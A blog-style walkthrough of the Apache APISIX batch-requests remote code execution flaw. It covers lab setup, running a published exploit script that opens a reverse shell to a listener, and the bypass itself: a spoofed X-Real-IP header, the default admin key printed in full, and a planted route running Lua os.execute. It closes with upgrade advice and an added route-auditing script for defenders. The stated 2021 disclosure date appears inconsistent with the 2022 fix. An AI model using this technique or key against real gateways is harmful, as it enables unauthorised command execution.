Exploiting the Apache APISIX < 2.12.1 RCE

Apache APISIX < 2.12.1 Remote Code Execution

What is Apache APISIX?

Apache APISIX is a dynamic, real-time, high-performance API gateway. It provides traffic management features such as load balancing, dynamic upstreams, authentication, canary releases, etc.

What is the Apache APISIX vulnerability?

On June 16, 2021, Apache officially disclosed a Remote Code Execution vulnerability in Apache APISIX versions prior to 2.12.1. An attacker can abuse the batch-requests plugin in APISIX to send requests that bypass the IP restriction, which results in bypassing whitelists and blacklists. If the default configuration is used, one can invoke the Admin API via the batch-requests plugin, enabling remote code execution.

1 - Set up the environment

Firstly, you have to download and install Apache APISIX on your local machine.

For that there are a couple of choices: you can use the RPM repository, Docker, the Helm chart, or the source release package to install it.

For the sake of simplicity we are going to use Docker.

1- Clone the git repo:

git clone https://github.com/apache/apisix-docker.git

2- Edit the docker-compose.yml file to change the image tag from :latest to a version prior to 2.12.1:

vim apisix-docker/example/docker-compose.yml

3- You can now bring it up with docker-compose:

docker-compose -p docker-apisix up -d

4- After this is done, you can access the Admin API with a simple curl:

curl 'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' -i

Note: you can find the admin API key in the config.yaml file.

5 - The result: the Admin API answers with the current list of routes.

2 - The Exploitation

You can check out and use this little Python script written by @VEN3XY and published on Exploit-DB.

Download the script from his GitHub repo: Apisix-Exploit.py

To run it you'll need the IP of your Docker interface; this command extracts it:

ip -4 addr show docker0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'

Then run the script:

python3 apisix-exploit.py http://127.0.0.1:9080/ 172.17.0.1 9999

After executing it you'll get a shell as the nobody user.

3 - The explanation

1 - Requests

At lines 77 and 79 of the script you can see that two requests are made to the API.

Looking at the json_data you can see that the first request just plants the payload and the second one triggers it: response1 is the planting request, response2 is the trigger.

2 - Executing

At lines 61 and 75 we can see that the planted route executes commands using Lua's os.execute.

As explained above, this RCE arises from being able to bypass the IP restriction and reach the Admin API when the default configuration is in use.

The IP restriction is bypassed by setting the X-Real-IP header to 127.0.0.1, and the Admin API is authenticated by setting X-API-KEY to the default admin API token, which is edd1c9f034335f136f87ad84b625c8f1.

After running the exploit, if we look at the routes with the API, we see that a new route has been added:

curl -s 'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' | jq

4 - Mitigation

A patched version (2.12.1) of APISIX has been released. Users can simply upgrade to the unaffected version.
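As a defender's follow-up to the two observations above (a planted route that shells out through os.execute, and an Admin API still protected by the shipped default key), here is an added audit script. It is not code from the page, from @VEN3XY's script or from the APISIX project. It takes the JSON that the curl to /apisix/admin/routes returns, flags every route whose script or filter_func field calls os.execute or a similar Lua function, and reports whether the key used to reach the Admin API is still the default edd1c9f034335f136f87ad84b625c8f1. The listing shape, the list of dangerous Lua calls and the sample routes are assumptions; the sample listing is constructed for the demo.

```python
import json
import re
import sys

# The admin key APISIX ships in its default config.yaml (quoted on the page).
DEFAULT_ADMIN_KEY = "edd1c9f034335f136f87ad84b625c8f1"

# Lua calls that should never appear in a route's inline script or filter_func.
# Which calls count as dangerous is an assumption made for this audit.
DANGEROUS_LUA = re.compile(r"\b(os\.execute|io\.popen|os\.remove|loadstring|load\s*\()")


def iter_routes(listing):
    """Yield (key, value) pairs from an Admin API /routes listing.

    Accepts the etcd-style shape {"node": {"nodes": [...]}} used by APISIX 2.x
    as well as a flat {"list": [...]} shape. Both shapes are assumptions: the
    page shows the command that produces the listing, not its body.
    """
    entries = listing.get("node", {}).get("nodes") or listing.get("list") or []
    for entry in entries:
        yield entry.get("key", "?"), entry.get("value") or {}


def audit_routes(listing):
    """Return one finding per route field that contains a dangerous Lua call."""
    findings = []
    for key, route in iter_routes(listing):
        for field in ("script", "filter_func"):
            code = route.get(field)
            if not isinstance(code, str):
                continue
            match = DANGEROUS_LUA.search(code)
            if match:
                findings.append({"route": key, "field": field, "call": match.group(1)})
    return findings


def uses_default_admin_key(api_key):
    """True when the deployment still authenticates with the shipped key."""
    return api_key == DEFAULT_ADMIN_KEY


# Constructed sample listing: route 1 is an ordinary proxy route, route 2 carries
# an inline Lua script that shells out, which is what a planted route looks like.
SAMPLE_LISTING = {
    "action": "get",
    "count": 2,
    "node": {
        "key": "/apisix/routes",
        "nodes": [
            {
                "key": "/apisix/routes/1",
                "value": {
                    "uri": "/hello",
                    "upstream": {"type": "roundrobin", "nodes": {"httpbin.org:80": 1}},
                },
            },
            {
                "key": "/apisix/routes/2",
                "value": {
                    "uri": "/planted",
                    "script": "local _M = {} function _M.access(conf, ctx) os.execute('id') end return _M",
                    "upstream": {"type": "roundrobin", "nodes": {"127.0.0.1:80": 1}},
                },
            },
        ],
    },
}


if __name__ == "__main__":
    # Usage: pipe the page's curl output in, optionally passing the key in use:
    #   curl -s 'http://127.0.0.1:9080/apisix/admin/routes?api_key=...' | python3 audit.py <api_key>
    # With no piped input the constructed sample listing is audited instead.
    listing = json.load(sys.stdin) if not sys.stdin.isatty() else SAMPLE_LISTING
    for finding in audit_routes(listing):
        print(f"suspicious route {finding['route']}: {finding['field']} calls {finding['call']}")
    key_in_use = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_ADMIN_KEY
    if uses_default_admin_key(key_in_use):
        print("WARNING: the admin key is still the default shipped with APISIX")
```

Run against a live instance, the script turns the "new route" check from the previous section into something repeatable: any hit on script or filter_func deserves a look at who created that route and when, and a default-key warning means the Admin API is reachable by anyone who can spoof X-Real-IP, patched or not.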

© 2022 - Sofiane Hamlaooui - Making the world a better place 🌎